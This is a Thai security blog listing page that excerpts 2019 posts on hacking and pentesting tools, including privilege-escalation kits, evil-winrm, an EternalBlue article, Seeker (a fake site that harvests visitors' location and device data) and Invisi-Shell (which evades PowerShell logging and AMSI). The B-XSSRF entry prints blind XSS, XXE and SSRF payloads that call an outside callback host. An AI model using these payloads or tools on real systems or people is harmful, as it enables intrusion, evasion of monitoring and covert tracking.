ข้ามไปที่เนื้อหาหลัก

บทความ

Automated Threat Intelligent System integrated with McAfee Advanced Threat Defense and Malware Information Sharing Platform

Tools   Automated Threat Intelligent System integrated with McAfee Advanced Threat Defense and Malware Information Sharing Platform   02/09/2019     Anastasis Vasileiadis Automated Threat Intelligent System An improvised automated threat intelligent system with advanced vulnerability scanners and Opensource Intelligence Information gathering python scripts when integrated with McAfee Advanced Threat Defense and Malware Information Sharing Platform can defend against new and futuristic cyber attacks. ATD-MISP with OpenDXL This integration is focusing on the automated threat intelligence collection with McAfee ATD, OpenDXL, and MISP. McAfee Advanced Threat Defense (ATD) will produce local threat intelligence that will be pushed via DXL. An OpenDXL wrapper will subscribe and parse indicators ATD produced and will import indicators into a threat intelligence management platform (MISP). Component Description McAfee Advanced Threat Defense (ATD)  ...

seeker v1.1.7 releases: Find GeoLocation with High Accuracy

Tools   seeker v1.1.7 releases: Find GeoLocation with High Accuracy   02/09/2019     Anastasis Vasileiadis Seeker Introduction Seeker utilizes  HTML5, Javascript, JQuery and PHP  to grab  Device Information  and  GeoLocation  with High Accuracy. Seeker Hosts a fake website on  Apache Server  and uses  Ngrok  to generate an SSL link which asks for Location Permission and if the user allows it, we can get : Longitude Latitude Accuracy Altitude – Not always available Direction – Only available if a user is moving Speed – Only available if a user is moving Along with Location Information, we can also get  Device Information  without any permissions : Operating System Platform Number of CPU Cores Amount of RAM – Approximate Results Screen Resolution GPU information Browser Name and Version Public  IP Address This tool is purely a Proof of Concept and is for Educational ...

0xsp Mongoose v1.7 – Linux/Windows Privilege Escalation intelligent Enumeration Toolkit

Tools   0xsp Mongoose v1.7 – Linux/Windows Privilege Escalation intelligent Enumeration Toolkit   02/09/2019     Anastasis Vasileiadis Using 0xsp mongoose you will be able to scan targeted operating system for any possible way for  privilege escalation  attacks, starting from collecting information stage until reporting information through 0xsp Web Application API. user will be able to scan different Linux / windows Operation systems at the same time with high performance, without spending time looking inside the terminal or text file for what is found, mongoose shortens this way by allowing you to send this information directly into web application friendly interface through easy API endpoint. project is divided into two sections  server  &  agent  . server  has been coded with PHP( codeigniter ) you need to install this application into your preferred environment, you can use it online or on your localhost. user is ...

juicy potato: Local Privilege Escalation tool

Tools   juicy potato: Local Privilege Escalation tool   02/09/2019     Anastasis Vasileiadis Juicy Potato (abusing the golden privileges) A sugared version of  RottenPotatoNG , with a bit of juice, i.e.  another Local  Privilege Escalation  tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM JuicyPotato allows you to: Target CLSID pick any CLSID you want.  Here  you can find the list organized by OS. COM Listening port define COM listening port you prefer (instead of the marshalled hardcoded 6666) COM Listening IP address bind the server on any IP Process creation mode depending on the impersonated user’s privileges you can choose from: CreateProcessWithToken  (needs  SeImpersonate ) CreateProcessAsUser  (needs  SeAssignPrimaryToken ) both Process to launch launch an executable or script if the exploitation succeeds Process Argument customize the launched process arguments RPC Serv...

B-XSSRF – Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF

Tools   B-XSSRF – Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF   02/09/2019     Anastasis Vasileiadis Toolkit to detect and keep track on Blind XSS,  XXE  & SSRF. SETUP Upload the files to your server. Create a Database and upload  database.sql  file to it. Change the  DB Credentials  in  db.php  file. Ready. USAGE BLIND XSS <embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> BLIND XXE <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> SSRF GET /testssrf.php=http://mysite.com/bxssrf/request.php DEFAULT CREDENTIALS USER : admin@test.com PASS : 123456 Download B-XSSRF

sslyze v2.1.4 releases: Fast and powerful SSL/TLS server scanning library

Tools   sslyze v2.1.4 releases: Fast and powerful SSL/TLS server scanning library   02/09/2019     Anastasis Vasileiadis SSLyze Fast and powerful  SSL/TLS  server scanning library for Python 2.7 and 3.4+. Description SSLyze is a Python library and a CLI tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive and should help organizations and testers identify misconfigurations affecting their SSL/TLS servers. Key features include: Fully  documented Python API , in order to run scans and process the results directly from Python. New: Support for TLS 1.3 (draft 18) and the  ROBOT vulnerability . Scans are automatically dispatched among multiple processes, making them very fast. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation a...

โพสต์ยอดนิยมจากบล็อกนี้

evil-winrm v1.6

evil-winrm v1.6 releases: Windows Remote Management shell for pentesting Evil-WinRM This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management  Protocol . A standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators. This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but most of its features are focused on hacking/pentesting stuff. Features Command History WinR...

Invisi-Shell: Bypass all Powershell security features

Invisi-Shell: Bypass all Powershell security features BY  DO SON   · PUBLISHED  FEBRUARY 15, 2019  · UPDATED  AUGUST 20, 2019 Invisi-Shell Hide your powershell script in plain sight! Invisi-Shell bypasses all of  Powershell  security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API. Download git clone https://github.com/OmerYa/Invisi-Shell.git Compilation Project was created with Visual Studio 2013. You should install the Windows Platform SDK to compile it properly. Use Copy the compiled InvisiShellProfiler.dll from /x64/Release/ folder with the two batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder. Run either of the batch files (depends if you have local admin privileges or not) Powershell console will run. Exit the powershell using the exit command (DON’T CLOSE TH...

ms17-010

วิธีการทดสอบและลองแฮกช่องโหว่ EternalBlue ในองค์กร ย้อนอดีตกลับไปช่องโหว่ที่ทำให้แฮกเกอร์ยึดเครื่องเหยื่อ (Remote Code Execution – RCE) ของระบบปฏิบัติการ Windows ก็มีหลายตัวเด่น ๆ เช่นในปี 2008 มีช่องโหว่ memory corruption ในไฟล์ NetAPI32.dll (MS08-067, CVE-2008-4250) ซึ่งทำให้คอมฯโดนแฮกผ่านโปรโตคอล SMB (Server Message Block) ที่เปิดมาโดยอัตโนมัติอยู่แล้วที่ TCP port 139 และ 445 Windows ผลคือแฮกเกอร์นำช่องโหว่นี้ไปไล่แฮกและใช้เป็นฟีเจอร์ของมัลแวร์ชื่อ Conficker มาโจมตีระบบเครือข่ายทั่วโลกและมีเหยื่อโดนแฮกเยอะมาก ๆ เพราะการออกแบบมัลแวร์ตัวนี้ใช้คุณสมบัติ wormable คือเมื่อแฮกคอมฯ 1 เครื่องได้แล้วก็จะทำการ สแกนระบบเครือข่าย เพื่อแฮกแล้วแพร่กระจายตัวเอง จากการแฮกไปยังเครื่องถัด ๆ ไปโดยการคัดลอกตัวเองออกไปเรื่อย ๆ อย่างรวดเร็ว ถัดจากปี 2008 ผ่านมาเกือบ 10 ปี เมื่อปี 2017 เป็นข่าวครึกโครมเกี่ยวกับช่องโหว่อีกครั้งเมื่อกลุ่มแฮกเกอร์ลึกลับที่ใช้ชื่อว่า The Shadow Brokers (TSB) ประกาศว่าตัวเองมีเครื่องมือลับสุดยอดที่ใช้ในปฏิบัติการแฮก ของสำนักงานความมั่นคงแห่งชาติสหรัฐอเมริกา (Na...